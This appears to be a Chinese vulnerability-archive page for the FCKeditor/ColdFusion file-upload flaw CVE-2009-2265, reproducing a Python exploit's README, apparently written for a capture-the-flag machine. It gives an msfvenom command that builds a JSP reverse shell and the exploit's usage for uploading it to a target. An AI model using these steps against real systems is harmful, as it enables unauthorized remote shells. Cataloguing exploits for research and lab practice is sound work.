关联漏洞
标题:FCKeditor 路径遍历漏洞 (CVE-2009-2265)Description:FCKeditor是个人开发者的一款开源的专用于在网页上编辑HTML的编辑器。 FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在路径遍历漏洞: 147.function FileUpload( $resourceType, $currentFolder ) 148.{ 149.$sErrorNumber = '0' ; 150.$sFileName = '' ; 151. 152.if ( isse
Description
coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/
介绍
# zaphoxx-coldfusion
coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/
The main reason I setup a python script for this particular cve was that the metasploit version of the same did not work for me when I tried to solve the HTB machine Arctic. Also it was nice to get some little python pratice. However there is another python version of that same exploit around which was originally created by Alexander Reid if you prefer to use his version.
Usage is pretty simple:
Make sure you have a payload file created
e.g. using msfvenom:
`msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp`
usage: `python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]`
`usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]`
optional arguments:
`-h, --help show this help message and exit`
`-t TARGET target ip`
`-p PORT target port`
`-f FILEPATH path of file with shellcode to upload`
`-b BASEPATH coldfusion basepath`
文件快照
[4.0K] /data/pocs/bc065872d9e033b85848235e85d68aff0283776c
├── [3.0K] 2265.py
└── [1.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →